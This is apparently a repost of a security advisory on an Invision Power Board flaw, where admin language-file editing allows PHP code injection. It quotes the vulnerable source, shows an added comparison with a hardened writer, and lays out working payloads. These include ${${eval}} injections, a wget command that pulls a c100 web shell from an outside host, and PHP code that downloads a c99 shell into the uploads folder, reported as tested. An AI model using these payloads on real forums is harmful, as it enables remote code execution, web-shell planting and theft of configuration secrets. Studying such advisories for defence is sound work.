Yjps blog
There is little discussion of this topic in China, so this summary is reposted from overseas sites.
http://mgsdl.free.fr/?0:18
6th method
VI - CODE EXECUTION
The ACP allows admins to manage languages: they can choose the default language, import a new one, and edit them. Let's take a look at the file "sources/action_admin/languages.php":
switch ($this->ipsclass->input['code'])
{
    ...
    case 'doedit':
        $this->ipsclass->admin->cp_permission_check(...);
        $this->save_langfile();
        break;
    ...
}

function save_langfile()
{
    ...
    $lang_file = CACHE_PATH . "cache/lang_cache/" . $row['ldir'] . "/" . $this->ipsclass->input['lang_file'];

    if (!file_exists($lang_file)) ...
    ...
    if (!is_writeable($lang_file)) ...
    ...
    $barney = array();

    foreach ($this->ipsclass->input as $k => $v)
    {
        if (preg_match("/^XX_(\S+)$/", $k, $match))
        {
            if (isset($this->ipsclass->input[$match[0]]))
            {
                $v = str_replace("&#39;", "'", stripslashes($_POST[$match[0]]));
                $v = str_replace("&#60;", "<", $v);
                $v = str_replace("&#62;", ">", $v);
                $v = str_replace("&#38;", "&", $v);
                $v = str_replace("", "", $v);

                $barney[$match[1]] = $v;
            }
        }
    }
As you can see, several replacements are made: some HTML entities are converted back to their corresponding characters, and stripslashes() is also called. We don't really care about that; it will not cause a problem, and it was only shown to illustrate how user input is treated. Now let's see how the change is written to disk:
    $start = "<?php\n\$lang = array(\n";

    foreach ($barney as $key => $text)
    {
        $text = preg_replace("/{1,}$/", "", $text);
        $start .= "'" . $key . "' => \"" . str_replace('"', '\"', $text) . "\",\n";
    }

    $start .= ");\n?" . ">";

    if ($fh = fopen($lang_file, 'w'))
    {
        fwrite($fh, $start);
        fclose($fh);
    }
So there is a protection against double quotes only, not against the other escape characters. There are several ways to bypass this protection.
The first method is to play with what we call "dynamic variables" (variable variables): a double-quoted PHP string interpolates ${...} expressions, so with two $ we can execute PHP code.
Example: ${${@eval($_SERVER[HTTP_SH])}}
The second one is to use another escape character; a backslash (\) will do the job. The attacker must change two inputs. Example:
First input: hello\
Second input: ); @eval($_SERVER[HTTP_SH]); /*
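The following is an added example, not code from the advisory or from IPB: it places the writer pattern described above (only double quotes escaped) beside a hardened writer, using inputs constructed from the two bypass shapes just discussed.

```php
<?php
// Added example (not IPB's code). Two ways of serialising language strings
// into a PHP file that will later be include()d by the board.

// Constructed inputs modelled on the two bypasses described in the advisory.
$inputs = [
    'help_txt' => 'Choose a topic ${${phpinfo()}}',  // ${...} interpolates inside "..."
    'first'    => 'hello\\',                        // trailing \ escapes the closing quote
    'second'   => '); phpinfo(); /*',               // now sits outside any string literal
];

// Vulnerable: escapes only the double quote, like the page's str_replace().
// A trailing backslash in the value turns \" into an escaped quote, so the
// string never closes where intended, and ${...} is still evaluated on include.
function build_vulnerable(array $strings): string
{
    $out = "<?php\n\$lang = array(\n";
    foreach ($strings as $key => $text) {
        $out .= "'" . $key . "' => \"" . str_replace('"', '\"', $text) . "\",\n";
    }
    return $out . ");\n";
}

// Hardened: var_export() emits single-quoted literals and escapes exactly the
// two characters that matter inside them (\ and '). Single-quoted strings never
// interpolate, so ${...} stays inert text. Keys are restricted to identifiers
// so a hostile key cannot close the array literal either.
function build_safe(array $strings): string
{
    $clean = [];
    foreach ($strings as $key => $text) {
        if (!preg_match('/^[A-Za-z0-9_]{1,64}$/', (string) $key)) {
            continue; // drop keys that are not plain identifiers
        }
        $clean[$key] = (string) $text;
    }
    return "<?php\n\$lang = " . var_export($clean, true) . ";\n";
}

// Compare the two generated files side by side: in the first, the 'first' and
// 'second' values merge into code; in the second, every value is inert data.
echo build_vulnerable($inputs), "\n---\n", build_safe($inputs);
```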
Exploitation
This trick works even against the current IPB version!
Just go to Admin --> Look and Feel --> Manage languages
Then choose a section, for example: public_help
Edit "help_txt", which originally is "Choose a topic from the list, or search for a topic"
Add some PHP code, so it becomes:
Code:
Choose a topic from the list, or search for a topic
${${phpinfo()}}
Save changes. Then go to the help section:
http://localhost/ipb.3.0.0.rc2/index.php?app=core&module=help
... and the PHP code will be executed
Or code:
${${phpinfo()}}
.......
${${system(wget http://blacknite.eu/php_shells/c100.txt)}}
And/or:
Read conf_global.php from the admin panel using basic admin privileges
Code:
$linky = "http://www.evilc0der.com/c99.txt";
$saved = "/home/path/towhatever/forum/uploads/shell.php";
$from = fopen("$linky", "r");
$to = fopen("$saved", "w");
while (!feof($from)) {
    $string = fgets($from, 4096);
    fputs($to, $string);
}
fclose($to);
fclose($from);
Root admin is required to know the path.
I tested this shell upload on IPB 2.3.6 and all was good
--------------------------------------
forums/cache/lang_cache/en/lang_help.php
forums/uploads/